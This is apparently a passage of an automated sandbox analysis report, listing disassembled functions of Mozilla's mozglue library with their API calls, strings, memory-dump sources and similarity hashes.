                                                                                                                                                                                                                                                                                        • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4251373892-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                                                                                        • Instruction ID: a84d0be199cbb28496848d864678cdc3f749461a9bf79d0afd453fb8ba94fde4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 557179B19007069FDB14CFA9C490AAAB7F5FF19308B104A3ED15A9BF80E731E555CB90
                                                                                                                                                                                                                                                                                        Function 6C9B9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9B8273), ref: 6C9B9D65
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C9B8273,?), ref: 6C9B9D7C
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C9B9D92
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9B9E0F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C9B946B,?,?), ref: 6C9B9E24
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?), ref: 6C9B9E3A
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C9B9EC8
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(6C9B946B,?,?,?), ref: 6C9B9EDF
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?), ref: 6C9B9EF5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 956590011-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 832ebaf5ef3c0875936127337d436d0e734ddf81b1aae6b431855a3bbf3094fe
                                                                                                                                                                                                                                                                                        • Instruction ID: a65b76491e3ee5d797cae369799144fe2d540189cbfdcbbddadd602a45faaab8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 832ebaf5ef3c0875936127337d436d0e734ddf81b1aae6b431855a3bbf3094fe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A71927050AB41EBD712CF19C48055BF3F4FFA9315B459A1DE85A5B702EB30E885CB91
                                                                                                                                                                                                                                                                                        Function 6C9BDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C9BDDCF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C99FA4B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B90E0: free.MOZGLUE(?,00000000,?,?,6C9BDEDB), ref: 6C9B90FF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B90E0: free.MOZGLUE(?,00000000,?,?,6C9BDEDB), ref: 6C9B9108
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9BDE0D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C9BDE41
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9BDE5F
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9BDEA3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9BDEE9
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9ADEFD,?,6C974A68), ref: 6C9BDF32
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9BDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9BDB86
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9BDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9BDC0E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9ADEFD,?,6C974A68), ref: 6C9BDF65
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9BDF80
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C985EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: memset.VCRUNTIME140(6C9C7765,000000E5,55CCCCCC), ref: 6C985F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: LeaveCriticalSection.KERNEL32(?), ref: 6C985FB2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 112305417-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ebce671e029be9a16a9c0c71d76fd369a3e6dd31113420d3c2226e4fa82ffbdd
                                                                                                                                                                                                                                                                                        • Instruction ID: ff01e36fd3d74c6b357ada35515ffefb1a2003522055e66ffed02d838a2a36aa
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebce671e029be9a16a9c0c71d76fd369a3e6dd31113420d3c2226e4fa82ffbdd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F451B477605701BBD7119B28C8806AFB3B6BFA5308F96051CE85A73B05D731F919CB92
                                                                                                                                                                                                                                                                                        Function 6C9C5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C9C5C8C,?,6C99E829), ref: 6C9C5D32
                                                                                                                                                                                                                                                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C9C5C8C,?,6C99E829), ref: 6C9C5D62
                                                                                                                                                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C9C5C8C,?,6C99E829), ref: 6C9C5D6D
                                                                                                                                                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C9C5C8C,?,6C99E829), ref: 6C9C5D84
                                                                                                                                                                                                                                                                                        • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C9C5C8C,?,6C99E829), ref: 6C9C5DA4
                                                                                                                                                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C9C5C8C,?,6C99E829), ref: 6C9C5DC9
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C9C5DDB
                                                                                                                                                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C9C5C8C,?,6C99E829), ref: 6C9C5E00
                                                                                                                                                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C9C5C8C,?,6C99E829), ref: 6C9C5E45
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2325513730-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5ab952971dd5b51f24ab4d2d209167d5d458ecf115006d0f6c3d11d77fbc6073
                                                                                                                                                                                                                                                                                        • Instruction ID: 9dc92c9492394ef38cf025c1f1030d25d8cd90939c4c6e0a50f464e2c4dc9486
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ab952971dd5b51f24ab4d2d209167d5d458ecf115006d0f6c3d11d77fbc6073
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E418E707043059FCB00DF65C898AAE77B9EF9D318F144069E50A9B791EB34EC45CB62
                                                                                                                                                                                                                                                                                        Function 6C99CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C9631A7), ref: 6C99CDDD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                                        • Opcode ID: 51644a73af61bd4c451e8cbc44d4e533a24f757b11e5738f3a7d994705bda751
                                                                                                                                                                                                                                                                                        • Instruction ID: 48f6e9e746a1befbc69f35562f26cd496e6fc4d4c9df4b54e52e0d2e404b06d2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51644a73af61bd4c451e8cbc44d4e533a24f757b11e5738f3a7d994705bda751
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8031E630B443065BFF10AFA58C45B6E7B79BF59B18F384018F616ABAC0DB70D8108BA4
                                                                                                                                                                                                                                                                                        Function 6C96ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96F100: LoadLibraryW.KERNEL32(shell32,?,6C9DD020), ref: 6C96F122
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C96F132
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000012), ref: 6C96ED50
                                                                                                                                                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C96EDAC
                                                                                                                                                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C96EDCC
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C96EE08
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C96EE27
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C96EE32
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C96EBB5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C99D7F3), ref: 6C96EBC3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C99D7F3), ref: 6C96EBD6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C96EDC1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                                        • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                                        • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                                                        • Opcode ID: 62a11fe2268fedc98e585b7be126c38cc7650df0c5d06d456f0940d0f1fb8904
                                                                                                                                                                                                                                                                                        • Instruction ID: bb5dfa459c57f699a1056206158772aec3aa26d443816d100eac1a4f912f9777
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62a11fe2268fedc98e585b7be126c38cc7650df0c5d06d456f0940d0f1fb8904
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2951D071D05204DBEB01DF69CC407EEB7B4AF69318F54842DE8556BB80E730E948CBA2
                                                                                                                                                                                                                                                                                        Function 6C9DA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C9DA565
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9DA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9DA4BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9DA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9DA4D6
                                                                                                                                                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C9DA65B
                                                                                                                                                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C9DA6B6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                                                                                        • String ID: 0$z
                                                                                                                                                                                                                                                                                        • API String ID: 310210123-2584888582
                                                                                                                                                                                                                                                                                        • Opcode ID: 37560d6d80de957a7cb874c3af0a6fb1ac3f2e5de5782c9337517793a86e7a3d
                                                                                                                                                                                                                                                                                        • Instruction ID: cc54a6fa76f7a7508ee3af50abf586e8a4ee86f999230ba11beb60bcacc5ea75
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37560d6d80de957a7cb874c3af0a6fb1ac3f2e5de5782c9337517793a86e7a3d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5413771909B45DFC341DF28C080A9FBBE5BF99354F408A2EF49997650EB30E559CB82
                                                                                                                                                                                                                                                                                        Function 6C9678C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,6C9E008B), ref: 6C967B89
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,6C9E008B), ref: 6C967BAC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9678C0: free.MOZGLUE(?,6C9E008B), ref: 6C967BCF
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,6C9E008B), ref: 6C967BF2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C985EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: memset.VCRUNTIME140(6C9C7765,000000E5,55CCCCCC), ref: 6C985F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: LeaveCriticalSection.KERNEL32(?), ref: 6C985FB2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3977402767-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e0d9ccb87586ad3ebd4cc79f098ae61bb2020205659ac7a8a820c74b5147a01d
                                                                                                                                                                                                                                                                                        • Instruction ID: 022ddb5a4f8435c6e9fd4f8fc5389646b8f004cc6be7a92c1ee60df715c6c9d2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0d9ccb87586ad3ebd4cc79f098ae61bb2020205659ac7a8a820c74b5147a01d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43C1A171E011298BFB248B29CCA0BADB772AF51318F1507A9D41AABFC1C731DE858F51
                                                                                                                                                                                                                                                                                        Function 6C9A9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: EnterCriticalSection.KERNEL32(6C9EE370,?,?,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284), ref: 6C99AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99ABD1
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9A947D
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9A946B
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9A9459
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                                        • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                                        • Opcode ID: a286742f646dde5702e9f9cea5497f30a33b84af54e0ec103b573ab522e1fd48
                                                                                                                                                                                                                                                                                        • Instruction ID: 5339ff1b63fb6d48df6833fe8939d8d2a163d2888a2dfa06ef6f11877cd6da4c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a286742f646dde5702e9f9cea5497f30a33b84af54e0ec103b573ab522e1fd48
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3012870A04100CBEF40DB9DE808A4533B8EF6E72DF150537D90A86F42EA22D5558957
                                                                                                                                                                                                                                                                                        Function 6C9B0F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9B0F6B
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9B0F88
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9B0FF7
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C9B1067
                                                                                                                                                                                                                                                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C9B10A7
                                                                                                                                                                                                                                                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C9B114B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C9C1563), ref: 6C9A8BD5
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9B1174
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9B1186
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
